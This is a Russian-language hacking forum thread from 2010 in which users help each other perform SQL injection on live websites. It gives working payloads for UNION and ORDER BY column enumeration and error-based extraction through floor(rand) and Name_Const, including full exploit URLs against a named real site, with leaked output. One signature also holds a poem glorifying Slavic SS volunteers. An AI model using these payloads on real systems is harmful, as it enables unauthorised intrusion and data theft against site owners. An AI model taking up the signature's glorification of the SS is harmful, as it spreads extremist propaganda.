Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.01.2010, 17:42
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Сообщение от ILYAtirtir
Почему именно union select 1,2,3 ?! Значит там другое кол-во полей в запросе,order by'ем проверяй.
Так он же раскрывает полностью запрос при подставлении кавычки
Код:
select surname, name, patronymic from people where id = 851'
Впрочем проверяю:
Код:
+order+by+1
+order+by+1,2
+order+by+1,2,3
Выводит нормально
Код:
select surname, name, patronymic from people where id = 851 order by 1,2,3,4
Unknown column '4' in 'order clause'
|
|
|
29.01.2010, 17:46
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от _iks_
Так он же раскрывает полностью запрос при подставлении кавычки
Код:
select surname, name, patronymic from people where id = 851'
Впрочем проверяю:
Код:
+order+by+1
+order+by+1,2
+order+by+1,2,3
Выводит нормально
Код:
select surname, name, patronymic from people where id = 851 order by 1,2,3,4
Unknown column '4' in 'order clause'
Блин ты вообще прочитал тему?
Переберай колонки епте.
union select 1,2,3,4 --
|
|
|
|
29.01.2010, 17:46
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Ну значит может быть там данные подставляются в два запроса. Можно заюзать крутой способ Qwazar'а.
http://forum.antichat.ru/threadnav119047-2-10.html
|
|
|
|
29.01.2010, 17:52
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Сообщение от Ctacok
Блин ты вообще прочитал тему?
Переберай колонки епте.
union select 1,2,3,4 --
Да делал я всё, делал. Перебирал до 20. Там вывод везде одинаковый, и только когда "union select 1,2,3" то вместо имён колонок ставит звёздочку.
Ну значит может быть там данные подставляются в два запроса. Можно заюзать крутой способ Qwazar'а.
http://forum.antichat.ru/threadnav119047-2-10.html
Спасибо, сейчас посмотрю
|
|
|
|
30.01.2010, 17:57
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
_iks_
кинь сюда ссылку или в ЛС, так быстрее будет!
|
|
|
|
30.01.2010, 21:36
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
немогу с одной уязвимостью разобратся..
http://****.ru/?лала=11940238')
Выводит ошыбку>
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\')' at line 1
Делаю>
http://****.ru/?лала=119402381+order+by+1/*
Все идет
Когда делаю вот так>
http://****.ru/?лала=-119402381+order+by+2--
то выходит белый экран
а так>
http://****.ru/?лала=-119402381+order+by+3--
Query failed: Unknown column '3' in 'order clause'
Пробовал разные методы с UNION SELECT и нечего не найду, делаю такой запрос
http://****.ru/?лала=119402381+AND+1=1+union+select+1,2/*
и все время выходит
Query failed: The used SELECT statements have a different number of columns
Подскажите пожалуйста что делать...
я знаю что там
DB Server:MySQL >=5
Последний раз редактировалось [Feldmarschall]; 30.01.2010 в 22:42..
|
|
|
|
30.01.2010, 22:10
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Выводи инфу в ошибку
pid=119402381+or(1,1)=(select+count(0),concat((sel ect+database()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)group+by+2)--+
Query failed: Duplicate entry 'bfstats1' for key 1
|
|
|
|
30.01.2010, 22:32
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от ElteRUS
Выводи инфу в ошибку
pid=119402381+or(1,1)=(select+count(0),concat((sel ect+database()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)group+by+2)--+
огромное спасиба !! выручил сильно !!! респект тебе 
Последний раз редактировалось [Feldmarschall]; 30.01.2010 в 22:41..
|
|
|
|
30.01.2010, 23:28
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465
Репутация:
0
|
|
Помогите,имеется сайт http:/ /www.ollis.ru/ ,там на каждой странице при кавычке ошибка такая:
SELECT * FROM _prop WHERE obj_type='block_page' and obj_id IN ('1'') - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')' at line 1
SELECT * FROM _prop WHERE obj_type='html_page' and obj_id IN ('block_page1'') - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''block_page1'')' at line 1
Как не пробовал вытащить информацию(пробовал order by, union select),никак не получается!Помогите как вытаскивать?
Знаю что база 5.0.22
|
|
|
|
30.01.2010, 23:36
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от MastaBass1
Помогите,имеется сайт http:/ /www.ollis.ru/ ,там на каждой странице при кавычке ошибка такая:
SELECT * FROM _prop WHERE obj_type='block_page' and obj_id IN ('1'') - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')' at line 1
SELECT * FROM _prop WHERE obj_type='html_page' and obj_id IN ('block_page1'') - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''block_page1'')' at line 1
Как не пробовал вытащить информацию(пробовал order by, union select),никак не получается!Помогите как вытаскивать?
Знаю что база 5.0.22
http://www.ollis.ru/index.php?id=cabinet')+order+by+7%23&type=cabinet& action=lost_pw&mode=return_from_hidden
http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) )a)%23&type=cabinet&action=lost_pw&mode=return_fro m_hidden
Duplicate column name '5.0.22'
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
Последний раз редактировалось HAXTA4OK; 30.01.2010 в 23:38..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1864954){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1865113){kind=avatar}
Похожие темы
Линейный вид
